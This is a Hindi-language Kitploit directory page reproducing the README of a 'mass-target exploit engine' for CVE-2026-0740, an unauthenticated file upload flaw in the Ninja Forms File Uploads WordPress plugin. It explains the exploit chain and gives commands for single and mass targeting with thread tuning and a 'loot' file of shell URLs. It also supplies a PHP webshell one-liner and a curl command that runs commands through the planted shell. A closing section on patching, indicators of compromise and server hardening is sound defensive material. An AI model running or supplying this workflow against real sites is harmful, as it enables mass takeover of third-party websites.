Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0740-mass — CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है। | Kitploit
उपकरण/GitHubGitHub/exdev994/cve-2026-0740-mass
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है।

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-0740 — मास-टार्गेट एक्सप्लॉइट इंजन

लेखक: 0xNuts
योगदानकर्ता: Cursor
रिपॉजिटरी: https://github.com/ExDev994/CVE-2026-0740-mass

CVE-2026-0740 के लिए PoC: Ninja Forms File Uploads <= 3.3.26 — अप्रमाणित मनमाना फ़ाइल अपलोड जो RCE की ओर ले जा सकता है।

प्रारंभिक कमजोरी Sélim Lanouar (@whattheslime) द्वारा खोजी गई थी। मास-टार्गेट इंजन PoC 0xNuts द्वारा Cursor के योगदान से विकसित किया गया था।


अस्वीकरण

यह रिपॉजिटरी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है (अधिकृत पेंटेस्ट, लिखित अनुमति वाली रेड टीम, पैच सत्यापन, और हार्डनिंग)।

  • मालिक की स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
  • लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं है।

कमजोरी का सारांश

वर्डप्रेस के लिए Ninja Forms - File Uploads प्लगइन 3.3.26 (सहित) तक के सभी संस्करणों में अप्रमाणित मनमाना फ़ाइल अपलोड के प्रति संवेदनशील है।

शोषण श्रृंखला:

  1. बिना प्रमाणीकरण वाला हमलावर AJAX एक्शन nf_fu_get_new_nonce के माध्यम से किसी भी के साथ अपलोड नॉन्स प्राप्त करता है।
field_id
  • हैंडलर nf_fu_upload अपलोड फ़ाइल एक्सटेंशन को मान्य करता है (जैसे image.jpg), लेकिन हमलावर POST पैरामीटर (image_jpg) के माध्यम से लक्ष्य फ़ाइल नाम को ओवरराइड कर सकता है।
  • लक्ष्य फ़ाइल नाम पर्याप्त सैनिटाइजेशन के बिना move_uploaded_file() को भेजा जाता है → मनमाना एक्सटेंशन + पाथ ट्रैवर्सल (../)।
  • वेक्टर / एक्सटेंशन<= 3.3.243.3.253.3.263.3.27
    पाथ ट्रैवर्सल (../)PASS---
    .phpPASS---
    .phtml, .pharPASSPASS--
    .phtPASSPASSPASS-
    .html, .svg, .jsPASSPASSPASS-

    पूर्ण पैच संस्करण 3.3.27+ में उपलब्ध है।


    आवश्यक शर्तें

    • Python 3.10+
    • लक्ष्य में Ninja Forms और Ninja Forms - File Uploads (<= 3.3.26) प्लगइन स्थापित और सक्रिय होना चाहिए
    • पहले से मौजूद फॉर्म या अपलोड फ़ील्ड की आवश्यकता नहीं है

    निर्भरताओं की स्थापना

    इस रिपॉजिटरी में केवल CVE-2026-0740.py और README.md है। निर्भरताओं को मैन्युअल रूप से स्थापित करें:

    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate          # Linux/macOS/WSL
    # .venv\Scripts\activate           # Windows
    
    pip install httpx==0.28.1 socksio==1.0.0
    

    उपयोग विधि

    CLI सहायता

    root@kitploit:~
    python3 CVE-2026-0740.py -h
    

    तर्क विकल्प

    Flagकार्य
    -t, --targetएकल लक्ष्य (एकल URL)
    -f, --targets-fileलक्ष्यों की सूची वाली .txt फ़ाइल (प्रति पंक्ति एक URL)
    --shellअपलोड की जाने वाली payload/webshell फ़ाइल (अनिवार्य)
    -d, --destलक्ष्य पाथ ट्रैवर्सल (डिफ़ॉल्ट: ../../../)
    -w, --workersसमवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 20)
    -o, --outputसफल शेल URL के लिए लूट फ़ाइल (डिफ़ॉल्ट: results.txt)
    -x, --proxyHTTP प्रॉक्सी (जैसे http://127.0.0.1:8080)
    -H, --headersकस्टम हेडर (प्रारूप: 'Header: Value')
    --timeoutHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)

    नोट: -t या -f में से केवल एक का उपयोग अनिवार्य है।


    एकल लक्ष्य मोड

    root@kitploit:~
    python3 CVE-2026-0740.py -t http://target.com --shell shell.php
    

    स्पष्ट पाथ ट्रैवर्सल के साथ:

    root@kitploit:~
    python3 CVE-2026-0740.py -t http://target.com --shell shell.php -d ../../../shell.php
    

    मास टार्गेट मोड

    target.txt फ़ाइल बनाएँ:

    root@kitploit:~
    http://site1.com
    https://site2.com
    10.0.0.5
    # baris komentar diabaikan
    

    चलाएँ:

    root@kitploit:~
    python3 CVE-2026-0740.py -f target.txt --shell shell.php
    

    वर्कर ट्यूनिंग और लूट आउटपुट के साथ:

    root@kitploit:~
    python3 CVE-2026-0740.py -f target.txt --shell shell.php -w 50 -o loot.txt
    

    सफलतापूर्वक अपलोड किए गए शेल URL लूट फ़ाइल में लिखे जाएँगे (append मोड)।


    न्यूनतम वेबशेल उदाहरण

    root@kitploit:~
    echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php
    

    अपलोड सफल होने के बाद, स्क्रिप्ट शेल URL प्रदर्शित करती है। सत्यापन (केवल लैब/अधिकृत लक्ष्य पर):

    root@kitploit:~
    curl "http://target.com/wp-content/shell.php?cmd=id"
    

    प्लगइन संस्करण का पता लगाना (वैकल्पिक)

    root@kitploit:~
    httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'
    

    सुधार के तरीके (मिटिगेशन)

    1. प्लगइन अपडेट करें (सर्वोच्च प्राथमिकता)

    Ninja Forms - File Uploads को तुरंत 3.3.27 या नए संस्करण में अपडेट करें।

    • वर्डप्रेस एडमिन → प्लगइन्स → Ninja Forms - File Uploads का संस्करण जाँचें
    • यदि स्वचालित अपडेट उपलब्ध नहीं है, तो आधिकारिक विक्रेता से पैच किया गया संस्करण डाउनलोड करें

    2. पैच सत्यापन

    अपडेट के बाद:

    • सुनिश्चित करें कि प्लगइन संस्करण >= 3.3.27 है
    • एक्शन nf_fu_get_new_nonce / nf_fu_upload के साथ endpoint wp-admin/admin-ajax.php का परीक्षण करें — मनमाना अपलोड अस्वीकार किया जाना चाहिए
    • पुष्टि के लिए स्कैनर (Nuclei template CVE-2026-0740) से दोबारा स्कैन करें

    3. समझौता संकेतक (IoC)

    वर्डप्रेस अपलोड निर्देशिकाओं की जाँच करें:

    root@kitploit:~
    wp-content/uploads/ninja-forms/tmp/
    wp-content/uploads/ninja-forms/
    wp-content/
    

    ऐसी बाहरी फ़ाइलें खोजें: .php, .pht, .phtml, .phar, .html, .svg, .js जो वहाँ नहीं होनी चाहिए।

    इसके अलावा निम्नलिखित के लिए वेब सर्वर लॉग की जाँच करें:

    root@kitploit:~
    /wp-admin/admin-ajax.php
    

    पैरामीटर action=nf_fu_get_new_nonce या action=nf_fu_upload के साथ।

    4. अतिरिक्त हार्डनिंग

    • मास-अपलोड दुरुपयोग को रोकने के लिए /wp-admin/admin-ajax.php पर WAF / रेट लिमिटिंग लगाएँ

    • वेब सर्वर कॉन्फ़िगरेशन के माध्यम से wp-content/uploads/ निर्देशिका में PHP निष्पादन अक्षम करें:

      Apache (uploads/ में .htaccess):

      root@kitploit:~
      <FilesMatch "\.php$">
        Require all denied
      </FilesMatch>
      

      Nginx:

      root@kitploit:~
      location ~* /wp-content/uploads/.*\.php$ {
          deny all;
      }
      
    • न्यूनतम विशेषाधिकार: सुनिश्चित करें कि अपलोड फ़ाइल अनुमतियाँ आवश्यक निर्देशिका के बाहर वेब सर्वर द्वारा लिखने योग्य न हों

    • मॉनिटरिंग: अज्ञात IP या उच्च मात्रा से nf_fu_* एक्शन के साथ admin-ajax.php पर POST के लिए अलर्ट सेट करें

    • बैकअप और घटना प्रतिक्रिया: यदि IoC पाया जाए, तो साइट को आइसोलेट करें, DB/एडमिन क्रेडेंशियल रोटेट करें, अन्य प्लगइन/थीम का ऑडिट करें

    5. यदि प्लगइन उपयोग नहीं किया जाता है

    यदि अपलोड सुविधा आवश्यक नहीं है, तो Ninja Forms - File Uploads प्लगइन को निष्क्रिय करें और हटा दें।


    संदर्भ

    • CVE-2026-0740
    • Lexfo — तकनीकी डीप डाइव
    • Wordfence — 50,000 वर्डप्रेस साइटें प्रभावित
    • GHSA-v8wq-rjpf-669f
    • Nuclei Template
    टूल डाउनलोड करें